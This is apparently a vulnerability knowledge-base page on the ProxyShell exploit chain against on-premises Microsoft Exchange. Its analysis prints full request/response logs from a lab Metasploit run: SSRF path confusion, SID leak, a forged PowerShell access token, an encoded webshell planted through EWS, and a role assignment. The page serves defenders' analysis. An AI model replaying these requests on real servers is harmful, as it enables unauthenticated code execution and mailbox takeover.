Attacker Value
Very High
(2 users assessed)
Exploitability
High
(2 users assessed)
User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown
11

ProxyShell Exploit Chain

Exploited in the Wild
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Initial Access
Techniques
Validation
Validated

Description

ProxyShell is an exploit chain targeting on-premise installations of Microsoft Exchange Server. It was demonstrated by Orange Tsai at Pwn2Own in April 2021 and is comprised of three CVEs that, when chained, allow a remote unauthenticated attacker to execute arbitrary code on vulnerable targets. The three CVEs are CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207.

Details are available in Orange Tsai’s Black Hat USA 2020 talk and follow-on blog series. ProxyShell is being broadly exploited in the wild as of August 12, 2021.

Add Assessment

4
Ratings
  • Attacker Value
    Very High
  • Exploitability
    High
Technical Analysis

Check out the Rapid7 analysis for details on the exploit chain. Seems like a lot of the PoC implementations so far are using admin mailboxes, but I’d imagine folks are going to start finding ways around that soon.

1
Ratings
Technical Analysis

CISA released an updated advisory on the BianLian ransomware group including the vulnerabilities the group is using to gain initial access towards victims.

https://www.cisa.gov/sites/default/files/2024-11/aa23-136a-joint-csa-stopransomware-bianlian-ransomware-group.pdf

General Information

Vendors

  • Microsoft

Products

  • Microsoft Exchange Server 2013 Cumulative Update 23,
  • Microsoft Exchange Server 2019 Cumulative Update 9,
  • Microsoft Exchange Server 2016 Cumulative Update 20,
  • Microsoft Exchange Server 2016 Cumulative Update 19,
  • Microsoft Exchange Server 2019 Cumulative Update 8

Exploited in the Wild

Reported by:
Technical Analysis

On August 5, 2021, in a Black Hat USA talk, DEVCORE researcher Orange Tsai shared information on several exploit chains targeting on-premises installations of Microsoft Exchange Server. Among the exploit chains presented was ProxyShell, an attack chain originally demonstrated at the Pwn2Own hacking competition this past April. Multiple researchers have detected widespread opportunistic scanning and exploitation of Exchange servers using the ProxyShell chain. Both public and private proof-of-concept exploit code is available.

ProxyShell allows a remote unauthenticated attacker to execute arbitrary commands on a vulnerable on-premises instance of Microsoft Exchange Server via port 443. The exploit chains three CVEs that, when chained, allow the attacker to bypass ACL controls, send a request to a PowerShell back end, and elevate privileges, effectively authenticating the attacker and allowing for remote code execution.

While ProxyShell and March’s ProxyLogon exploit chain are the two attacks that have already resulted in widespread exploitation, they are not the only exploit chains targeting on-premises Exchange servers. Exchange continues to be valuable and accessible attack surface area for both sophisticated and run-of-the-mill threat actors.

ProxyShell chain CVEs:

While CVE-2021-34473 and CVE-2021-34523 were patched in April, Microsoft’s advisories note that they were inadvertently omitted from publication until July.

Note: There has been confusion about which CVE is which across various advisories and research descriptions—Microsoft, for instance, describes CVE-2021-34473 as a remote code execution vulnerability, but Orange Tsai’s Black Hat slides list CVE-2021-34473 as the initial ACL bypass. Community researchers have also expressed confusion over CVE numbering across the ProxyShell chain.

Affected products

The following versions of Exchange Server are vulnerable to all three ProxyShell CVEs:

  • Microsoft Exchange Server 2019 Cumulative Update 9
  • Microsoft Exchange Server 2019 Cumulative Update 8
  • Microsoft Exchange Server 2016 Cumulative Update 20
  • Microsoft Exchange Server 2016 Cumulative Update 19
  • Microsoft Exchange Server 2013 Cumulative Update 23

Exploit chain analysis

Some requests have been omitted for brevity.

The ProxyShell exploit chain, as implemented by the Metasploit module, begins by leaking a known user’s legacy DN from the Autodiscover service. In this case, the known user is smcintyre@exchg.lan, and the resulting legacy DN is /o=Target Org/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=508ce51c27b544b38c33df31f99d3118-smcintyre.

[*] Sending autodiscover request
####################
# Request:
####################
POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/autodiscover/autodiscover.xml HTTP/1.1
Host: 192.168.159.42
User-Agent: Mozilla/5.0
Cookie: Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net
Accept: */*
Cache-Control: no-cache
Connection: keep-alive
Content-Type: text/xml; charset=utf-8
Content-Length: 371

<?xml version="1.0" encoding="utf-8"?>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
  <Request>
    <EMailAddress>smcintyre@exchg.lan</EMailAddress>
    <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
  </Request>
</Autodiscover>

####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/10.0
request-id: c143229e-7884-48f3-8506-839e795ef39f
X-CalculatedBETarget: win-bpid95acq7e.exchg.lan
X-DiagInfo: WIN-BPID95ACQ7E
X-BEServer: WIN-BPID95ACQ7E
X-AspNet-Version: 4.0.30319
Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:43 GMT; path=/Autodiscover; secure; HttpOnly
X-Powered-By: ASP.NET
X-FEServer: WIN-BPID95ACQ7E
Date: Wed, 18 Aug 2021 19:14:43 GMT
Content-Length: 3890

<?xml version="1.0" encoding="utf-8"?>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/responseschema/2006">
  <Response xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
    <User>
      <DisplayName>Spencer McIntyre</DisplayName>
      <LegacyDN>/o=Target Org/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=508ce51c27b544b38c33df31f99d3118-smcintyre</LegacyDN>
      <AutoDiscoverSMTPAddress>smcintyre@exchg.lan</AutoDiscoverSMTPAddress>
      <DeploymentId>63b273d5-83e6-4f6b-aab1-0930d3c878be</DeploymentId>
    </User>
    <Account>
      <AccountType>email</AccountType>
      <Action>settings</Action>
      <MicrosoftOnline>False</MicrosoftOnline>
      <Protocol>
        <Type>EXCH</Type>
        <Server>cccb94e0-3175-4ec9-8e8a-62679d874384@exchg.lan</Server>
        <ServerDN>/o=Target Org/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=cccb94e0-3175-4ec9-8e8a-62679d874384@exchg.lan</ServerDN>
        <ServerVersion>73C18880</ServerVersion>
        <MdbDN>/o=Target Org/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=cccb94e0-3175-4ec9-8e8a-62679d874384@exchg.lan/cn=Microsoft Private MDB</MdbDN>
        <PublicFolderServer>win-bpid95acq7e.exchg.lan</PublicFolderServer>
        <AD>WIN-BPID95ACQ7E.exchg.lan</AD>
        <ASUrl>https://win-bpid95acq7e.exchg.lan/EWS/Exchange.asmx</ASUrl>
        <EwsUrl>https://win-bpid95acq7e.exchg.lan/EWS/Exchange.asmx</EwsUrl>
        <EmwsUrl>https://win-bpid95acq7e.exchg.lan/EWS/Exchange.asmx</EmwsUrl>
        <EcpUrl>https://win-bpid95acq7e.exchg.lan/owa/</EcpUrl>
        <EcpUrl-um>?path=/options/callanswering</EcpUrl-um>
        <EcpUrl-aggr>?path=/options/connectedaccounts</EcpUrl-aggr>
        <EcpUrl-mt>options/ecp/PersonalSettings/DeliveryReport.aspx?rfr=olk&amp;exsvurl=1&amp;IsOWA=&lt;IsOWA&gt;&amp;MsgID=&lt;MsgID&gt;&amp;Mbx=&lt;Mbx&gt;&amp;realm=exchg.lan</EcpUrl-mt>
        <EcpUrl-ret>?path=/options/retentionpolicies</EcpUrl-ret>
        <EcpUrl-sms>?path=/options/textmessaging</EcpUrl-sms>
        <EcpUrl-photo>?path=/options/myaccount/action/photo</EcpUrl-photo>
        <EcpUrl-tm>options/ecp/?rfr=olk&amp;ftr=TeamMailbox&amp;exsvurl=1&amp;realm=exchg.lan</EcpUrl-tm>
        <EcpUrl-tmCreating>options/ecp/?rfr=olk&amp;ftr=TeamMailboxCreating&amp;SPUrl=&lt;SPUrl&gt;&amp;Title=&lt;Title&gt;&amp;SPTMAppUrl=&lt;SPTMAppUrl&gt;&amp;exsvurl=1&amp;realm=exchg.lan</EcpUrl-tmCreating>
        <EcpUrl-tmEditing>options/ecp/?rfr=olk&amp;ftr=TeamMailboxEditing&amp;Id=&lt;Id&gt;&amp;exsvurl=1&amp;realm=exchg.lan</EcpUrl-tmEditing>
        <EcpUrl-extinstall>?path=/options/manageapps</EcpUrl-extinstall>
        <OOFUrl>https://win-bpid95acq7e.exchg.lan/EWS/Exchange.asmx</OOFUrl>
        <UMUrl>https://win-bpid95acq7e.exchg.lan/EWS/UM2007Legacy.asmx</UMUrl>
        <OABUrl>https://win-bpid95acq7e.exchg.lan/OAB/30ff0e0d-10d6-4f13-aad5-00857bcb65dc/</OABUrl>
        <ServerExclusiveConnect>off</ServerExclusiveConnect>
      </Protocol>
      <Protocol>
        <Type>EXPR</Type>
        <Server>win-bpid95acq7e.exchg.lan</Server>
        <SSL>Off</SSL>
        <AuthPackage>Ntlm</AuthPackage>
        <ServerExclusiveConnect>on</ServerExclusiveConnect>
        <CertPrincipalName>None</CertPrincipalName>
        <GroupingInformation>Default-First-Site-Name</GroupingInformation>
      </Protocol>
      <Protocol>
        <Type>WEB</Type>
        <Internal>
          <OWAUrl AuthenticationMethod="Basic, Fba">https://win-bpid95acq7e.exchg.lan/owa/</OWAUrl>
          <Protocol>
            <Type>EXCH</Type>
            <ASUrl>https://win-bpid95acq7e.exchg.lan/EWS/Exchange.asmx</ASUrl>
          </Protocol>
        </Internal>
      </Protocol>
    </Account>
  </Response>
</Autodiscover>
[*] Server: cccb94e0-3175-4ec9-8e8a-62679d874384@exchg.lan
[*] LegacyDN: /o=Target Org/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=508ce51c27b544b38c33df31f99d3118-smcintyre

Next, the legacy DN is fed to a MAPI-over-HTTP request in order to leak the user’s SID. The resulting SID for smcintyre@exchg.lan is S-1-5-21-2800676829-2777257591-1686523126-1000. This information is later used to forge an access token.

[*] Sending mapi request
####################
# Request:
####################
POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/mapi/emsmdb HTTP/1.1
Host: 192.168.159.42
User-Agent: Mozilla/5.0
Cookie: Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net
X-RequestType: Connect
X-ClientInfo: {0064DC00-7E9D-E4FD-388B-EFF21747C74C}
X-ClientApplication: Outlook/15.0.4815.1002
X-RequestId: {8A6CFECB-FF20-F8DB-B3FD-06E3256E303B}:22322
Content-Type: application/mapi-http
Content-Length: 145

/o=Target Org/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=508ce51c27b544b38c33df31f99d3118-smcintyre�		
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/mapi-http
Server: Microsoft-IIS/10.0
request-id: 97949297-5ce8-402e-a30d-efba108a8b9b
X-CalculatedBETarget: win-bpid95acq7e.exchg.lan
X-ServerApplication: Exchange/15.01.2176.002
X-RequestId: {8A6CFECB-FF20-F8DB-B3FD-06E3256E303B}:22322
X-ClientInfo: {0064DC00-7E9D-E4FD-388B-EFF21747C74C}
X-RequestType: Connect
X-TunnelExpirationTime: 1800000
X-PendingPeriod: 30000
X-ExpirationInfo: 300000
X-ResponseCode: 0
X-DiagInfo: WIN-BPID95ACQ7E
X-BEServer: WIN-BPID95ACQ7E
X-AspNet-Version: 4.0.30319
Set-Cookie: MapiRouting=UlVNOmY3YTFjMjU4LTFhODQtNGIzOC1hMjU0LTk4NWVlODdhM2M3OTqKE2BvfGLZCA==; path=/mapi/; secure; HttpOnly, MapiContext=MAPIAAAAAPK79diayoPH/suKyZiv6sn7y/nI5dXtwPHJ6djv1eDW7N7mvJ+omq6Yr5yrm6KFAAAAAAAAAA==; path=/mapi/emsmdb; secure; HttpOnly, MapiSequence=0-jHA9Yg==; path=/mapi/emsmdb; secure; HttpOnly, X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:43 GMT; path=/Autodiscover; secure; HttpOnly
X-Powered-By: ASP.NET
X-FEServer: WIN-BPID95ACQ7E
Date: Wed, 18 Aug 2021 19:14:43 GMT
Content-Length: 1152

PROCESSING
DONE
X-StartTime: Wed, 18 Aug 2021 19:14:43 GMT
X-ElapsedTime: 6


 CWIN-BPID95ACQ7E.exchg.laF
                          �KClientAccessServer=WIN-BPID95ACQ7E.exchg.lan,ConnectTime=8/18/2021 3:14:43 PM,ConnectionID=134

 $IMicrosoft.Exchange.RpcClientAccess.Server.LoginPermException: 'User SID: S-1-5-18' can't act as owner of a UserMailbox object '/o=Target Org/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=508ce51c27b544b38c33df31f99d3118-smcintyre' with SID S-1-5-21-2800676829-2777257591-1686523126-1000 and MasterAccountSid  (StoreError=LoginPerm)
   at Microsoft.Exchange.RpcClientAccess.Server.UserManager.User.CorrelateIdentityWithLegacyDN(ClientSecurityContext clientSecurityContext)
   at Microsoft.Exchange.RpcClientAccess.Server.RpcDispatch.<>c__DisplayClass47_0.<Connect>b__3()
   at Microsoft.Exchange.RpcClientAccess.Server.RpcDispatch.ExecuteWrapper(Func`1 getExecuteParameters, Func`1 executeDelegate, Action`1 exceptionSerializationDelegate)
[*] SID: S-1-5-21-2800676829-2777257591-1686523126-1000 (smcintyre@exchg.lan)
wvu@kharak:~$ echo VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA | base64 -d | xxd
00000000: 5601 0054 0757 696e 646f 7773 4300 4108  V..T.WindowsC.A.
00000010: 4b65 7262 6572 6f73 4c13 736d 6369 6e74  KerberosL.smcint
00000020: 7972 6540 6578 6368 672e 6c61 6e55 2e53  yre@exchg.lanU.S
00000030: 2d31 2d35 2d32 312d 3238 3030 3637 3638  -1-5-21-28006768
00000040: 3239 2d32 3737 3732 3537 3539 312d 3136  29-2777257591-16
00000050: 3836 3532 3331 3236 2d31 3030 3047 0100  86523126-1000G..
00000060: 0000 0700 0000 0c53 2d31 2d35 2d33 322d  .......S-1-5-32-
00000070: 3534 3445 0000 0000                      544E....
wvu@kharak:~$

Leveraging EWS impersonation, a webshell is specially encoded and then stored in the user’s mailbox as an attachment to a saved draft. The webshell allows for the execution of arbitrary commands.

####################
# Request:
####################
POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/ews/exchange.asmx HTTP/1.1
Host: 192.168.159.42
User-Agent: Mozilla/5.0
Cookie: Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net
Accept: */*
Cache-Control: no-cache
Connection: keep-alive
Content-Type: text/xml;charset=UTF-8
Content-Length: 1612

<soap:Envelope
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
  xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
  xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Header>
    <t:RequestServerVersion Version="Exchange2016" />
    <t:SerializedSecurityContext>
      <t:UserSid>S-1-5-21-2800676829-2777257591-1686523126-1000</t:UserSid>
      <t:GroupSids>
        <t:GroupIdentifier>
          <t:SecurityIdentifier>S-1-5-21</t:SecurityIdentifier>
        </t:GroupIdentifier>
      </t:GroupSids>
    </t:SerializedSecurityContext>
  </soap:Header>
  <soap:Body>
    <m:CreateItem MessageDisposition="SaveOnly">
      <m:Items>
        <t:Message>
          <t:Subject>QiCa8qDMK1</t:Subject>
          <!-- todo: make these fields totes legit -->
          <t:Body BodyType="HTML"></t:Body>
          <t:Attachments>
            <t:FileAttachment>
              <t:Name>ut_est.rtf</t:Name>
              <t:IsInline>false</t:IsInline>
              <t:IsContactPhoto>false</t:IsContactPhoto>
              <t:Content>MJXWVIa3aRQ5zakG3/ep39r/lmFnVIa3aRSWOYb3BqkU/5bW2oal2oaW2V33BlQUt9MGObmp39opINOpDYzJ6dqlqc2Mvtpc99rWFH6WRlttXC0oXWGWD2uW9wbWqV3alskxIZX71lSGt2kU2Q==</t:Content>
            </t:FileAttachment>
          </t:Attachments>
          <t:ToRecipients>
            <t:Mailbox>
              <t:EmailAddress>lillie@cassin.co</t:EmailAddress>
            </t:Mailbox>
          </t:ToRecipients>
        </t:Message>
      </m:Items>
    </m:CreateItem>
  </soap:Body>
</soap:Envelope>

####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Transfer-Encoding: chunked
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/10.0
request-id: 79055639-a812-46d4-afb1-63dbb8ab8f61
X-CalculatedBETarget: win-bpid95acq7e.exchg.lan
X-DiagInfo: WIN-BPID95ACQ7E
X-BEServer: WIN-BPID95ACQ7E
X-AspNet-Version: 4.0.30319
Set-Cookie: exchangecookie=b5c02db0ac974bdd913a1fbb1f310fc2; expires=Thu, 18-Aug-2022 19:14:43 GMT; path=/; HttpOnly, X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:43 GMT; path=/Autodiscover; secure; HttpOnly
X-Powered-By: ASP.NET
X-FEServer: WIN-BPID95ACQ7E
Date: Wed, 18 Aug 2021 19:14:43 GMT

<?xml version="1.0" encoding="utf-8"?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Header><h:ServerVersionInfo MajorVersion="15" MinorVersion="1" MajorBuildNumber="2176" MinorBuildNumber="2" Version="V2017_07_11" xmlns:h="http://schemas.microsoft.com/exchange/services/2006/types" xmlns="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"/></s:Header><s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><m:CreateItemResponse xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"><m:ResponseMessages><m:CreateItemResponseMessage ResponseClass="Success"><m:ResponseCode>NoError</m:ResponseCode><m:Items><t:Message><t:ItemId Id="AAMkAGNjY2I5NGUwLTMxNzUtNGVjOS04ZThhLTYyNjc5ZDg3NDM4NABGAAAAAADyTxREGt41Q6z6KZqfeXqwBwCk4ApHvBQ0QbSbHuMHQlaiAAAAAAEPAACk4ApHvBQ0QbSbHuMHQlaiAACPmv2vAAA=" ChangeKey="CQAAABYAAACk4ApHvBQ0QbSbHuMHQlaiAACPmwCf"/><t:Attachments><t:FileAttachment><t:AttachmentId Id="AAMkAGNjY2I5NGUwLTMxNzUtNGVjOS04ZThhLTYyNjc5ZDg3NDM4NABGAAAAAADyTxREGt41Q6z6KZqfeXqwBwCk4ApHvBQ0QbSbHuMHQlaiAAAAAAEPAACk4ApHvBQ0QbSbHuMHQlaiAACPmv2vAAABEgAQAB7XeOl5YbxOur9FB/Y1glY="/></t:FileAttachment></t:Attachments></t:Message></m:Items></m:CreateItemResponseMessage></m:ResponseMessages></m:CreateItemResponse></s:Body></s:Envelope>

Setting the X-Rps-CAT request parameter to the forged access token documented earlier enables access to Exchange PowerShell remoting. Using the New-ManagementRoleAssignment cmdlet, the Mailbox Import Export role is assigned to the user being impersonated.

[*] Assigning the 'Mailbox Import Export' role
####################
# Request:
####################
POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/PowerShell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net HTTP/1.1
Host: 192.168.159.42
User-Agent: Mozilla/5.0
Cookie: none
Accept: */*
Cache-Control: no-cache
Connection: keep-alive
Content-Type: application/soap+xml;charset=UTF-8
Content-Length: 12138

<?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:env="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config"><env:Header><a:To>http://127.0.0.1/PowerShell/</a:To><a:ReplyTo><a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize><a:MessageID>uuid:1FA7A332-BF9E-41D5-A0A6-DB3445500A88</a:MessageID><p:SessionId mustUnderstand="false">uuid:D15EBBDD-EFE9-4368-9C74-DB2A170DBF24</p:SessionId><w:Locale xml:lang="en-US" mustUnderstand="false"/><p:DataLocale xml:lang="en-US" mustUnderstand="false"/><w:OperationTimeout>PT60S</w:OperationTimeout><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><a:Action mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Create</a:Action><w:OptionSet env:mustUnderstand="true"><w:Option Name="protocolversion" MustComply="true">2.3</w:Option></w:OptionSet></env:Header><env:Body><rsp:Shell ShellId="DC0360BA-4A8C-4EF8-ADF1-012F7296DFF9" Name="Runspace"><rsp:InputStreams>stdin pr</rsp:InputStreams><rsp:OutputStreams>stdout</rsp:OutputStreams><creationXml xmlns="http://schemas.microsoft.com/powershell">AAAAAAAAAAEAAAAAAAAAAAMAAADhAgAAAAIAAQC6YAPcjEr4Tq3xAS9ylt/5AAAAAAAAAAAAAAAAAAAAAO+7vzxPYmogUmVmSWQ9IjAiPgogIDxNUz4KICAgIDxWZXJzaW9uIE49InByb3RvY29sdmVyc2lvbiI+Mi4zPC9WZXJzaW9uPgogICAgPFZlcnNpb24gTj0iUFNWZXJzaW9uIj4yLjA8L1ZlcnNpb24+CiAgICA8VmVyc2lvbiBOPSJTZXJpYWxpemF0aW9uVmVyc2lvbiI+MS4xLjAuMTwvVmVyc2lvbj4KICA8L01TPgo8L09iaj4KAAAAAAAAAAIAAAAAAAAAAAMAAB0VAgAAAAQAAQC6YAPcjEr4Tq3xAS9ylt/5AAAAAAAAAAAAAAAAAAAAAO+7vzxPYmogUmVmSWQ9IjAiPgogIDxNUz4KICAgIDxJMzIgTj0iTWluUnVuc3BhY2VzIj4xPC9JMzI+CiAgICA8STMyIE49Ik1heFJ1bnNwYWNlcyI+MTwvSTMyPgogICAgPE9iaiBOPSJQU1RocmVhZE9wdGlvbnMiIFJlZklkPSIxIj4KICAgICAgPFROIFJlZklkPSIwIj4KICAgICAgICA8VD5TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlJ1bnNwYWNlcy5QU1RocmVhZE9wdGlvbnM8L1Q+CiAgICAgICAgPFQ+U3lzdGVtLkVudW08L1Q+CiAgICAgICAgPFQ+U3lzdGVtLlZhbHVlVHlwZTwvVD4KICAgICAgICA8VD5TeXN0ZW0uT2JqZWN0PC9UPgogICAgICA8L1ROPgogICAgICA8VG9TdHJpbmc+RGVmYXVsdDwvVG9TdHJpbmc+CiAgICAgIDxJMzI+MDwvSTMyPgogICAgPC9PYmo+CiAgICA8T2JqIE49IkFwYXJ0bWVudFN0YXRlIiBSZWZJZD0iMiI+CiAgICAgIDxUTiBSZWZJZD0iMSI+CiAgICAgICAgPFQ+U3lzdGVtLlRocmVhZGluZy5BcGFydG1lbnRTdGF0ZTwvVD4KICAgICAgICA8VD5TeXN0ZW0uRW51bTwvVD4KICAgICAgICA8VD5TeXN0ZW0uVmFsdWVUeXBlPC9UPgogICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+CiAgICAgIDwvVE4+CiAgICAgIDxUb1N0cmluZz5Vbmtub3duPC9Ub1N0cmluZz4KICAgICAgPEkzMj4yPC9JMzI+CiAgICA8L09iaj4KICAgIDxPYmogTj0iQXBwbGljYXRpb25Bcmd1bWVudHMiIFJlZklkPSIzIj4KICAgICAgPFROIFJlZklkPSIyIj4KICAgICAgICA8VD5TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlBTUHJpbWl0aXZlRGljdGlvbmFyeTwvVD4KICAgICAgICA8VD5TeXN0ZW0uQ29sbGVjdGlvbnMuSGFzaHRhYmxlPC9UPgogICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+CiAgICAgIDwvVE4+CiAgICAgIDxEQ1Q+CiAgICAgICAgPEVuPgogICAgICAgICAgPFMgTj0iS2V5Ij5QU1ZlcnNpb25UYWJsZTwvUz4KICAgICAgICAgIDxPYmogTj0iVmFsdWUiIFJlZklkPSI0Ij4KICAgICAgICAgICAgPFROUmVmIFJlZklkPSIyIiAvPgogICAgICAgICAgICA8RENUPgogICAgICAgICAgICAgIDxFbj4KICAgICAgICAgICAgICAgIDxTIE49IktleSI+UFNWZXJzaW9uPC9TPgogICAgICAgICAgICAgICAgPFZlcnNpb24gTj0iVmFsdWUiPjUuMC4xMTA4Mi4xMDAwPC9WZXJzaW9uPgogICAgICAgICAgICAgIDwvRW4+CiAgICAgICAgICAgICAgPEVuPgogICAgICAgICAgICAgICAgPFMgTj0iS2V5Ij5QU0NvbXBhdGlibGVWZXJzaW9uczwvUz4KICAgICAgICAgICAgICAgIDxPYmogTj0iVmFsdWUiIFJlZklkPSI1Ij4KICAgICAgICAgICAgICAgICAgPFROIFJlZklkPSIzIj4KICAgICAgICAgICAgICAgICAgICA8VD5TeXN0ZW0uVmVyc2lvbltdPC9UPgogICAgICAgICAgICAgICAgICAgIDxUPlN5c3RlbS5BcnJheTwvVD4KICAgICAgICAgICAgICAgICAgICA8VD5TeXN0ZW0uT2JqZWN0PC9UPgogICAgICAgICAgICAgICAgICA8L1ROPgogICAgICAgICAgICAgICAgICA8TFNUPgogICAgICAgICAgICAgICAgICAgIDxWZXJzaW9uPjEuMDwvVmVyc2lvbj4KICAgICAgICAgICAgICAgICAgICA8VmVyc2lvbj4yLjA8L1ZlcnNpb24+CiAgICAgICAgICAgICAgICAgICAgPFZlcnNpb24+My4wPC9WZXJzaW9uPgogICAgICAgICAgICAgICAgICAgIDxWZXJzaW9uPjQuMDwvVmVyc2lvbj4KICAgICAgICAgICAgICAgICAgICA8VmVyc2lvbj41LjAuMTEwODIuMTAwMDwvVmVyc2lvbj4KICAgICAgICAgICAgICAgICAgPC9MU1Q+CiAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICA8L0VuPgogICAgICAgICAgICAgIDxFbj4KICAgICAgICAgICAgICAgIDxTIE49IktleSI+Q0xSVmVyc2lvbjwvUz4KICAgICAgICAgICAgICAgIDxWZXJzaW9uIE49IlZhbHVlIj40LjAuMzAzMTkuNDIwMDA8L1ZlcnNpb24+CiAgICAgICAgICAgICAgPC9Fbj4KICAgICAgICAgICAgICA8RW4+CiAgICAgICAgICAgICAgICA8UyBOPSJLZXkiPkJ1aWxkVmVyc2lvbjwvUz4KICAgICAgICAgICAgICAgIDxWZXJzaW9uIE49IlZhbHVlIj4xMC4wLjExMDgyLjEwMDA8L1ZlcnNpb24+CiAgICAgICAgICAgICAgPC9Fbj4KICAgICAgICAgICAgICA8RW4+CiAgICAgICAgICAgICAgICA8UyBOPSJLZXkiPldTTWFuU3RhY2tWZXJzaW9uPC9TPgogICAgICAgICAgICAgICAgPFZlcnNpb24gTj0iVmFsdWUiPjMuMDwvVmVyc2lvbj4KICAgICAgICAgICAgICA8L0VuPgogICAgICAgICAgICAgIDxFbj4KICAgICAgICAgICAgICAgIDxTIE49IktleSI+UFNSZW1vdGluZ1Byb3RvY29sVmVyc2lvbjwvUz4KICAgICAgICAgICAgICAgIDxWZXJzaW9uIE49IlZhbHVlIj4yLjM8L1ZlcnNpb24+CiAgICAgICAgICAgICAgPC9Fbj4KICAgICAgICAgICAgICA8RW4+CiAgICAgICAgICAgICAgICA8UyBOPSJLZXkiPlNlcmlhbGl6YXRpb25WZXJzaW9uPC9TPgogICAgICAgICAgICAgICAgPFZlcnNpb24gTj0iVmFsdWUiPjEuMS4wLjE8L1ZlcnNpb24+CiAgICAgICAgICAgICAgPC9Fbj4KICAgICAgICAgICAgPC9EQ1Q+CiAgICAgICAgICA8L09iaj4KICAgICAgICA8L0VuPgogICAgICA8L0RDVD4KICAgIDwvT2JqPgogICAgPE9iaiBOPSJIb3N0SW5mbyIgUmVmSWQ9IjYiPgogICAgICA8TVM+CiAgICAgICAgPE9iaiBOPSJfaG9zdERlZmF1bHREYXRhIiBSZWZJZD0iNyI+CiAgICAgICAgICA8TVM+CiAgICAgICAgICAgIDxPYmogTj0iZGF0YSIgUmVmSWQ9IjgiPgogICAgICAgICAgICAgIDxUTiBSZWZJZD0iNCI+CiAgICAgICAgICAgICAgICA8VD5TeXN0ZW0uQ29sbGVjdGlvbnMuSGFzaHRhYmxlPC9UPgogICAgICAgICAgICAgICAgPFQ+U3lzdGVtLk9iamVjdDwvVD4KICAgICAgICAgICAgICA8L1ROPgogICAgICAgICAgICAgIDxEQ1Q+CiAgICAgICAgICAgICAgICA8RW4+CiAgICAgICAgICAgICAgIC